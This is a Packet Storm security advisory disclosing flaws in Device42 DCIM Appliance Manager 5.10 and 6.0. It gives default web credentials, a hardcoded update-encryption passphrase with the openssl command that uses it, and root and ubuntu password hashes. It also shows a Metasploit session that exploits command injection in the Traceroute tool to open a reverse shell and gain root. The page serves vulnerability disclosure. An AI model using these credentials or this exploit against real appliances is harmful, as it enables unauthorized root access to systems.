exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Device42 Embedded Credentials

Device42 Embedded Credentials
Posted Nov 26, 2014
Authored by Brandon Perry

Device42 DCIM Appliance Manager versions 5.10 and 6.0 have hardcoded credentials and also suffer from remote command injection vulnerabilities.

tags | exploit, remote, vulnerability
SHA-256 | 47d0bb4ee432dc13a705f89a07909d8cdbdeeb3f951e98bf1888d524fb84ce61

Device42 Embedded Credentials

Change Mirror Download
Remote Authenticated Root in Device42 DCIM Appliance Manager v5.10 and v6.0

http://www.device42.com/download/



Device42 ships virtual appliances ready for production use as a trial
(essentially dictated by the license provided).


The Appliance Manager listens on HTTP (no SSL) on port 4242 with default
credentials of d42admin:default.


Within the Appliance Manager, the Ping and Traceroute utilities are
susceptible to command injection via bash metacharacters. The user which
the commands get executed under is the 'ubuntu' user, but this user has
passwordless sudo ability, so it is essentially root access. Two exploits
are provided that exploit these vulnerabilities using the default
credentials.


Updates from device42 are encrypted by default to prevent users from
creating their own updates and uploading them, but the password for the
encrypted zip file is 'pass:zofo8REgqM' so any user could create their own
encrypted update using this passphrase.


openssl enc -aes-256-cbc -d -in /tmp/update.enc -out /tmp/update.zip -pass
pass:zofo8REgqM


Also, the root and ubuntu users have default passwords in the shadow file.


Root –
$6$zhdissWh$2VrhU3tncXClbuUU3dJk2ieAKF3kTPpvcT9/VKw.Yw4rl1E2eYpAYAfZUgSZvYhqVQvUqLVRp8HOsoMueKgd10


Ubuntu –
$6$1eU5n9o7$w4.tmNriNT1Zb5HabWwlGmnmy8ij1fKbn0UGf9raHKdIaurYVD/ZU9C2s6DBueKhVbekZCozzAoHZH43.OwDi/






















msf exploit(device42_tracert_exec) > show options


Module options (exploit/linux/http/device42_tracert_exec):


Name Current Setting Required Description

---- --------------- -------- -----------

Proxies no Use a proxy chain

RHOST 192.168.1.81 yes The target address

RPORT 4242 yes The target port

VHOST no HTTP server virtual host



Payload options (cmd/unix/reverse):


Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 192.168.1.31 yes The listen address

LPORT 4444 yes The listen port



Exploit target:


Id Name

-- ----

0 Automatic Targeting



msf exploit(device42_tracert_exec) > exploit


[*] Started reverse double handler

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo YWFxSIuVtNUMShSi;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket A

[*] A: "YWFxSIuVtNUMShSi\r\n"

[*] Matching...

[*] B is input...

[*] Command shell session 3 opened (192.168.1.31:4444 -> 192.168.1.81:39878)
at 2014-11-22 17:36:59 -0600


sudo su

id

uid=0(root) gid=0(root) groups=0(root)

exit

id

uid=1000(ubuntu) gid=1000(ubuntu)
groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),114(sambashare)

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close